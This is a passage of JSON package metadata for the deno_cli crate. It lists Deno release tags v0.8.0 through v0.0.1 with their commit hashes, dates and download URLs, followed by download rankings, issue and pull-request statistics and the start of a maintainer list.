-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T00:40:33.253Z","dependent_packages_count":0,"downloads":20496,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":21.016650935183236,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.028408309888841035,"forks_count":0.08705772385289993,"average":16.85254254373505},"purl":"pkg:cargo/deno_cli","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cli","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cli","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cli/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1